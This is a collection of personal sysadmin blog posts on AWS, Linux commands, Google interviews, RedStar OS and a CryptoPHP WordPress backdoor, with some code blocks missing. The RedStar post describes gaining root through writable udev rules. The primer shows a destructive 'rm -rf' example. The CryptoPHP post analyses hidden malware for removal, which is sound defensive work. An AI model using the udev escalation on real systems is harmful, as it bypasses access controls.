When working with AWS EC2, it’s often handy to be able to reference certain information about an instance. The obvious solution is the AWS Metadata service, accessible with a simple cURL command. For example, to get the private IP address of an instance:
Since I hate writing boilerplate code, and don’t need to make an HTTP request each time I want to know something about my environment, I put together a Docker image that fetches most of the available metadata and outputs environment variable settings. Also, I’ve been itching to write something in Go.
My primary use case is to create /etc/aws.env when a new CoreOS instance starts, but this should work on any system with systemd. To do this, aws-env.service should be installed and configured to run at startup. One way to do this is via cloud-config (EC2 User Data):
- name: aws-env.service
# Contents from 'aws-env.service' go here
An error occurred (ValidationError) when calling the PutLifecycleHook operation: Unable to publish test message to notification target arn:aws:sqs:us-west-2:123456:my-sqs-queue.fifo using IAM role arn:aws:iam:1234:role/my-asg-role. Please check your target and role configuration and try to put lifecycle hook again.
All of the search results for that error turned up solutions involving incorrect IAM policies. This should not be the case if you simply add the AutoScalingNotificationAccessRole per the instructions. For reference, the correct settings are below.
In my case, however, it turns out that AutoScaling can’t publish to a FIFO queue. Recreating the queue as a standard queue fixed this problem for me.
If you’ve installed Shiny Server Pro as a user other than shiny, you might have experienced difficulty adding R packages. This is because Shiny Server Pro runs R as the shiny user, and running R -e “install.packages(‘foo’)” will install packages to the local user’s files only.
The solution to this is to su to the shiny user:
su - shiny
R -e "install.packages('foo', repos='http://cran.rstudio.com')"
Alternatively, this script will parse an R file looking for require statements and install the necessary packages. It isn’t very smart, so be careful.
This post provides examples of everyday Linux commands. I wrote this as a quick orientation to the CLI for newcomers. Keep in mind that there are usually several ways to accomplish a task, and other command combinations or programs might be better suited to your needs. Don’t be afraid to google it.
Get Help With Commands By Using MAN
The examples on this page represent a small fraction of the possible uses for each command. Many commands have tons of flags and arguments that allow them to adapt to many scenarios. Since it’s impossible to remember how each program works, its arguments, etc., most come with a manual page, or man page. The man command retrieves the manual for the program and displays it on the screen. While sometimes verbose, man pages are typically your best source of initial information. This is the Manual in “RTFM“.
The man system has several different sections, each providing documentation on a specific aspect of the program:
Library functions (Particularly the C STL)
Special files and drivers (Typically in /dev)
File Formats & Conventions
Games and Screensavers
System Administration Commands and Daemons
Typing man <command> will generally display section 1, if it exists. Calling man on something else — for example, the C function pthread_join, will display page 3 by default. To view other sections, type man <page> <command>. Note that not all programs have manual pages. Of those that do, most don’t have manual pages in each section. On some systems, you can type “man <page>” and press TAB to view a list of pages available for that section.
To view the manual page for man itself, type man man.
Finding the right Linux command with apropos
The Unix Tools Philosophy aims for tools that serve a specific purpose and can be chained together and results in a seemingly-endless variety of tools to accomplish the same job. The apropos command will search the manual pages for terms and return a list of possible commands. This “search” feature isn’t full-featured and works mostly on keyword matching.
apt-ftparchive (1) - Utility to generate index files
ftp (1) - Internet file transfer program
netkit-ftp (1) - Internet file transfer program
netrc (5) - user configuration for ftp
pam_ftp (8) - PAM module for anonymous access module
pftp (1) - Internet file transfer program
sftp (1) - secure file transfer program
smbclient (1) - ftp-like client to access SMB/CIFS resources on servers
Sometimes the number of commands can be unwieldy (try “apropos user” or “apropos ip“). Since the apropos command doesn’t do well with terms like “add user” or “ftp upload”, it’s sometimes useful to join the output with grep. You can also pipe the output to more or less.
apropos user | grep add
adduser.conf (5) - configuration file for adduser(8) and addgroup(8) .
addgroup (8) - add a user or group to the system
adduser (8) - add a user or group to the system
pam_issue (8) - PAM module to add issue file to user prompt
useradd (8) - create a new user or update default new user information
List directories with ls
ls is the command for listing a directory. Useful flags include:
-a (–all), which shows dotfiles
-l which provides a long listing that includes file size and type,
-h (–human-readable) shows filesizes in normal units instead of bytes (1.23 GB instead of 1234921293)
-S to sort by file size
Default ll command, plus human-readable sizes
alias ll=”ls -alh”
List all tar files in current directory:
List tar files in long format:
ls -l *.tar
List the largest10 files in a directory and output size in human readable form:
ls -lhS | head -n 10
Navigate the filesystem with CD and MC
Navigating around the filesystem is done with the change directory (cd) command. Instead of merely listing the contents of the /tmp directory (ls -l /tmp), you can move into the /tmp directory and list the contents of the current directory:
cd /tmp && ls -l
To return to your home directory, simply type cd with no arguments. You can also use the shortcut ~ to refer to files from your home directory. The two paths below describe the same location on the filesystem, assuming that the second command is run by the cmattoon user.
If you aren’t sure which directory you’re in, you can use the pwd (Present Working Directory) command to tell you.
Midnight Commander (mc) is a third-party application that some people find useful for navigating the filesystem, copying and moving files, etc. You can find more information on their site.
Move, Rename and Copy files with mv and cp
Copy a config file to a backup:
cp config.ini config.ini.bak
Copy the entire config directory and it’s contents:
cp -r config/ config-backup
Remove files with rm and shred
There is no “undo” command for rm.
The rm command removes files basically forever, so be careful.
There is no “undo” command for rm. Some people choose to edit their ~/.bashrc or ~/.bash_aliases and add the following:
alias rm="rm -i" # Ask for confirmation before deleting files.
Linux makes the process of deleting a file forever deceptively simple:
To indiscriminately remove everything in the “/tmp” directory:
rm -rf /tmp/*
Note: Either “rm -rf /tmp/” or “rm -rf /tmp” would delete the “/tmp” directory itself.
rm My\ Document
For private information, you might consider using shred.
Read large files one screen at a time with more and less
More and less are two programs that filter text output. They’re commonly used to page through large files, but can also be used to buffer output from programs. It’s a helpful habit to read config files with more or less, rather than open it with a text editor. In both programs, you can find help by pressing h and exit by pressing the q key.
cat README.md | less
Writes the output of the install process to the screen for later
./install.sh 2>&1 | less
Although both programs are very similar, less is the newer one with more features. Specifically, less allows forward and backward navigation (via arrow keys and PgUp/PgDn) and doesn’t have to read the entire file into memory. This makes it more efficient on large files than it’s predecessor, more.
Use the slash key (/) to begin a search. While a search is in progress, the “n” key will move to the next result.
Download files with curl and wget
Since both curl and wget support HTTP/HTTPS and FTP, they are especially useful for interacting with web-based services like API’s and HTML forms. Both programs use the HTTP GET method by default, but are capable of others as well (POST, HEAD, PUT, etc..), and both support SSL. cURL supports even more protocols including Telnet, SCP, SFTP, POP3, IMAP, SMTP and LDAP, and a number of other features.
Generally speaking, I prefer wget for downloading files and cURL for
Note: Ubuntu comes with wget, but you’ll need to install curl. CentOS and OS X are the opposite. You’ll probably need to download one or the other.
To download a file with wget:
If the URL contains special characters, or is pointing to a script, it’s sometimes better to wrap the URL in quotes and use the -O flag to specify an output file.
If you still want to see error output, but no progress bar, you can use -sS in curl. The lowercase -s is for silent mode, the uppercase -S for “show errors”.
For more details, type “man wget” or “man curl”.
Check disk usage with du and df
To check the amount of disk space available, use the df command (think “disk free space”). The du command will show you the amount of disk space used in the specified directory. Like the ls command, both df and du can output the human-readable filesize by using the -h flag.
Output of df -h will show the disk space for all mounted drives by default:
To see how much space the current directory is taking up, use du -sh. The -s flag means “summary”, and prints the total usage of all subdirectories. WIthout the -s flag, du will generate a report for each subdirectory. This feature can be useful for finding the largest n files in a directory. The following command finds the 10 largest subdirectories of the current directory. By piping the output of du into sort (-h sort by human-readable filesize, -r reverse), we can sort the files from largest to smallest. That output is then piped into head to retrieve the top 10 only.
du -h . | sort -rh | head
Of course, you could pipe this output to more or less and peruse the entire list of directories, but there’s already a better tool for this:ncdu. (The “nc” alludes to the ncurses library used to render the user interface.) As you can see in the screenshot below, ncdu provides an easy way of tracking down large files.
Get file contents with cat and strings
The cat and strings commands are used to write file contents to stdout. The cat command will dump the raw file contents (in whatever form), while strings will print only printable characters. This feature makes the strings command a useful choice in identifying a file format or other initial discovery tasks.
Print raw binary data of /bin/true to stdout:
See all human-readable strings in the “true” binary:
Zero a file with cat:
cat /dev/null > README.md
Find what you’re looking for with grep and find
Grep (Globally search a Regular Expression and Print) is useful for finding strings in files (or stdout). The find utility is used for searching by file name, size, etc.
To find all PHP files with the string “@todo” (case insensitive) in the src/ directory:
grep -i "@todo" src/*.php
Recursively search the src/ directory for files containing the string “@todo” (case-insensitive):
grep -ri "@todo" src/
This uses the -r(–recursive) and -i (–ignore-case) flags. As you may suspect, the –recursive flag searches the directory recursively, while the –ignore-case flag ignores the difference between uppercase and lowercase characters.
Grep is also useful to filter output from commands or stdout:
If you have multi-line output in the log, grep will cut off all but the first line. If you want to see lines on either side of the target line use the -A (–after-context) or -B (–before-context). For example, consider grepme.txt, a file with “This is Line #n” from 0-30. Both commands produce the same output:
grep 20 grepme.txt -A 5 -B 3
cat grepme.txt | grep "20" -A 5 -B 3
This is Line #17
This is Line #18
This is Line #19
This is Line #20
This is Line #21
This is Line #22
This is Line #23
This is Line #24
This is Line #25
Other useful examples include -v, which inverts the match and the -L/-l flags that show filenames of lines matched instead of lines matched.
Show all lines in access log that don’t include “GoogleBot”:
I interviewed at Google Pittsburgh a while back (as a result of Google FooBar), and while I signed an NDA regarding the interview questions, I can provide a brief overview of the process. Ultimately, I did not receive an offer, so take this for what it’s worth.
Google will email you some official interview preparation materials, which you should obviously review. They outline the process very thoroughly, as well as provide an outline of possible material. If you’ve prepared for technical interviews before, much of this content is not a surprise, but it would be foolish not to review everything they’ve sent.
How does their interview process work?
Typically, there are phone interviews, then an on-site interview. I skipped the phone interview stage because of FooBar, and went directly to the on-site interviews.
If you are selected after submitting an application, or re-apply, you’ll be asked to do a phone interview first.
Since I can’t offer guidance here, I’ll refer you to Google’s Interviews page for specific details.
How much time should I allot to studying?
This answer depends on how comfortable you are with your CS fundamentals. Most people dedicate at least a month, possibly more. A recruiter told me they’re not able to schedule interviews greater than 30 days ahead, but you have the option of contacting them later to schedule. From every interaction I’ve had (a couple recruiters, and the engineers on-site), they genuinely want you to be at the top of your game when you come in. Take your time. They’re almost too cool about making sure you’re prepared for the interview process.
The on-site interview can be done over one day or two. I’m not sure what game theory says here, but I went for the one-day interview. This consisted of five interviews, about 45 minutes each. (You’ll also meet up with another engineer for lunch, which isn’t really part of the interview process.) They’ve even put up an example interview on YouTube:
Do not expect them to ask about your past projects, resume, etc. I saw a lot of complaining on glassdoor about this (mostly from people who didn’t get an offer).
They’re less interested in your specific background and accomplishments than your ability to solve the problems presented, which seems to offend a lot of people. Furthermore, everyone I met was super friendly, except for one interviewer who really didn’t seem interested in stepping away from work to interview someone. I’m told this is happens most frequently in phone interviews, though.
Generally speaking, the problems I was presented had a brute-force solution and an elegant solution or two. If you reach a working solution, they’ll likely ask a few cursory questions about Big-O notation or what data structure you’re using, then ask you to iterate on your code to meet additional requirements, consume fewer resources, or otherwise refine your solution. While they might appear to be tricky questions, they’re really not out to get you. The problems are very much in line with the TopCoder Division I problems, and I’m told that being comfortable with solving those types problems correlates with success at Google.
I was able to solve two of the problems relatively easily, had difficulty with the third, and did not reach a working solution for two other problems. You are not necessarily penalized for not reaching a solution, but it obviously helps. I’m told they’re more interested in your thought process and approach than getting a working solution.
Review Comp-sci fundamentals
You should be comfortable discussing the various types of sorting algorithms, BFS/DFS, tree and graph manipulation, etc. You will be expected to talk intelligently about Big-O notation and discuss the running time and space constraints of the algorithms you design. You should be able to digest the problem and find the most appropriate data structure (array, stack, linked list, graph, etc). I did not have any problems that involved crazy complex algorithms or cutting-edge research.
Stacks & Queues
Tree insertion, manipulation, and search
Practice, practice, practice
Commit to doing at least one practice problem each day. You will be expected to do one interview in a compiled language (C++, Java, or Go), but are permitted to do the rest in a common language of your choosing (e.g., Python). I’d venture to guess that nearly all Google engineers are polyglots, and as long as you’re not using Lisp or Prolog or something, you should be fine. Talk with your recruiter, or attend the prep session for answers to specific questions like these.
What Libraries Are Permitted?
Neither myself nor my interviewers were aware of a specific list of libraries that are allowed, but I was permitted to use common Python and C++ libraries (bisect, std::vector, etc.), as long as they didn’t solve the problem outright (e.g., Python’s sorted() function). You are not expected to implement everything from scratch either – they want to see modern, idiomatic programming.
Example Google Interview Questions
The internet has some specific interview questions that others have asked, but obviously Google’s engineers aren’t dumb, and Google itself is uniquely aware of what content people are searching for. They routinely change up the questions, and I’m told their validated question pool is sufficiently large that you can’t study the test. That being said, the questions I’ve seen online accurately reflect the difficulty level of the problems I had, but my problems were 100% unrelated. Be able to apply the basics.
As someone without a CS degree, the questions that I had weren’t entirely outside my grasp. I could almost see the right solution, but wasn’t quite able to implement some of them. More preparation would have definitely helped.
Many of the questions were related to problems I’d solved while practicing. The best I can do in describing them is this: they’re standard comp-sci problems, with a twist. They’re close enough to standard problems that they’ll expect you to use the appropriate algorithms and/or data structures, but modified slightly so that you’ll have to actually understand what’s going on. Rote memorization of quicksort, mergesort, etc. won’t do.
This information can now be used to log in to MySQL’s command-line interface:
mysql -u username -p
Leaving the “-p” parameter empty will trigger MySQL to prompt you for a password. On a *NIX server, it will look like you’re not typing anything — this is by design. While you may specify the password in the same line, this can leave your plaintext password in your command history, which is easily readable. If you want to use this format anyway (i.e., in a script), note that you cannot put a space between the “-p” flag and your password:
mysql -u username -ppassword
Once you’ve logged in, you can view available databases with the show databases; command. To use your wordpress database, take the value from DB_NAME (above) and use the use command: use wordpress;. To see available tables in the selected database, run show tables;.
The TrackMan mouse has four (physical) buttons which include a large left and right button (1, 3), that serve as the primary mouse buttons, and two smaller left and right buttons (8, 9) that trigger your browser’s “back” and “forward” buttons. To replace this action with “Ctrl+Click” to scroll, insert the following lines in your ~/.bashrc (or anywhere else that can call some commands):
I recently stumbled upon a copy of RedStar OS, which appears to be a RHEL-based server distribution developed by North Korea. Version 2.5 was initially purchased and reviewed by a Russian student studying abroad, and a user by the name of slipstream uploaded version 3.0 (server) to TPB in mid-2014.
Several reports portray it as a tool to monitor web usage by the regime, and while I don’t doubt that, it seems unnecessary to repackage an operating system to do so. It seems more likely that it’s a symbol of sovereignty and independence from Windows (made in USA). Since North Korea’s internet is a giant class A network (10.76.1.0/22), any reporting software would likely try to report to an otherwise “internal” network. For example, the browser packaged with the OS has its homepage set to 10.76.1.11. A quick Wireshark analysis didn’t reveal anything immediately suspicious, but I’ve yet to dig into that fully.
On the surface, it’s a pretty hollow clone of RHEL using KDE desktop. The directory structure is a cross between OSX and *nix, as is the overall feel of the desktop environment.
It comes with a couple of standard applications – a calculator, notepad, contact book, etc., as well as QuickTime and Naenera Browser (a Firefox clone). As Naenera (“my country”) is also the name of the official web portal, and that most citizens can’t access the “international internet”, the two might as well be synonymous.
You can see the public-facing Naenera at http://www.naenara.com.kp/en/, but be aware that they’ve been known to inject malware on some of their public-facing sites.
It’s also interesting to note there’s a CHM (compiled HTML) viewer. This is typically used for software documentation, and very well may be the case here. I’d be interested to see if this is utilized for something akin to Cuba’s Paquetes, downloading parts of the Kwangmyong, or something altogether different. (There is an empty “Sites” folder in the user’s home directory)
There’s an OpenOffice clone, called Sogwang Office.
It also has this music composition program, UnBangUI:
The mail program doesn’t have any clear way to add an email account, but does prevent you from checking mail until you’ve added one.
The software center only allows importing from /media. There is a repository of extra applications that’s offered on a second CD (the Russian site says the extra CD costs about twice what the original OS costs), and I haven’t started to dig through that yet.
In the “System Update” area, the Settings dialog shows a location for a URL and proxy, but I’m not sure it’s usable.
Interestingly, the user isn’t added to sudoers and the root account is disabled. Fortunately, this is trivial to bypass, since someone “overlooked” the permissions in /etc/udev/rules.d. If you’re looking for a terminal shortcut, you won’t find it – you’ll have to press Alt+F2, then run konsole to get a shell.
Once you’ve done that, fire up vi and create /tmp/freedom, or whatever you’d like to call it.
Now, open up that file in /etc/udev/rules.d and call /tmp/freedom via a RUN expression:
Now that that’s taken care of, you’ll need to refresh the udev rules. In VirtualBox, this worked simply by taking a snapshot, but you might have to reboot.
Enabling English on RedStar OS
Once you’re back up and running, you’ll likely want to enable a language other than Korean. While some reports state that Korean is the only language on the system, this isn’t true. It’s just that Korean is selected by default. Now that you have sudo superpowers, this can be done easily with sed: (obviously,for a language other than US English, use the appropriate locale code)
sed -i 's/ko_KP/en_US/g' /etc/sysconfig/i18n
sed -i 's/ko_KP/en_US/g' /usr/share/config/kdeglobals
Log out, and you should see the login screen in English:
That’s it! You should now be able to browse around the OS relatively easily. I’ll post some interesting findings later, once I’ve had an opportunity to dig through it more.
I received this error after making some changes to a Hiera config and the referenced “dev-server” role.
Error: Could not retrieve catalog from remote server: Error 400 on SERVER: Error from DataBinding 'hiera' while looking up 'role::dev-server::use_ssl': undefined method `empty?' for nil:NilClass on node servername.local
Warning: Not using cache on failed catalog
Error: Could not retrieve catalog; skipping run
It turns out this is a vague syntax error. Checking the following has worked for me:
Ensuring the syntax of your Hiera YAML or JSON file is correct. Check for trailing commas in JSON, or misplaced colons. (“foo:bar”, “foo::bar:”, “foo:::bar”, etc.)
The variable name is unique. In one case, “dev-server::use_ssl” was configuring a child resource with the same “use_ssl” property/param/variable.
There are no empty YAML or JSON files in your hieradata directory. I think I’ve had a similar issue with temp files (*~)
If you’ve modified your hiera.yaml to add a new hierarchy or something, restart Puppet.
This is a series of posts on CryptoPHP, a PHP backdoor used for spamming and blackhat SEO. It seems to come bundled with certain copies of WordPress themes from unofficial sites and resides in a file named “social.png”. It comes installed with a list of email addresses and domains to contact and communicates with a C2 server using cURL and OpenSSL for encryption. Its main purpose appears to be to facilitate the display of links and other content, sent from the C2 server. When the script determines that a web crawler (e.g., GoogleBot), and not a real user, is viewing the site, it injects links to third-party sites in hopes of being indexed.
CryptoPHP communicates with external servers, requiring multiple external requests. You may see the following symptoms:
WordPress is slow to load, especially during the first pageview
Error messages in your server log, possibly due to failed requests.
Error messages from IDS/IPS or other security software (e.g., Suhosin) indicating that someone is making calls to exec and eval.
A few days ago, I noticed that a WordPress installation was running extremely slowly. After enabling xhprof and profiling the index page, I noticed that a single method (RoQfzgyhgTpMgdUIktgNdYvKE) was taking around 160 seconds to run. The method name (others in the stack were similarly named) and the 23 calls to curl_exec came off as immediately suspicious. I used grep to search for the file and found it under the themes folder as images/social.png.
This file was included at the bottom of a theme file, causing it to be executed on each page load.
<?php include_once(‘images/social.png’); ?>
Opening social.png in a text editor reveals obfuscated and minified code. While it looks like a mess, it’s simply renamed variables and functions with whitespace removed, and can be undone rather easily with the “Find/Replace All” feature of your favorite text editor.
How to Remove CryptoPHP or social.png
In the limited tests that I’ve done, the offending file – social.png – is the only file that is malicious. It seems to be added to the images/ directory in themes downloaded from unofficial sources. Another line in the main theme files (index.php, header.php or footer.php) includes the file.
While nothing in the file itself indicates that personal or sensitive data is being transmitted back to the server, the file allows its controllers to send commands to it. These commands are then executed by the eval and exec commands in PHP. It is theoretically possible for content, account information, etc. to be transmitted back to the controlling server.
Since the WordPress instance I was using was running on localhost, it would have been unreachable by the controlling servers. It could still phone home and download commands, but could not be controlled directly. However, due to the possibility of sensitive data being stolen, and the evidence of storing information in the database, I’d recommend a complete re-install of WordPress and changing your admin password(s).
Encryption methods (including a script to decrypt database contents)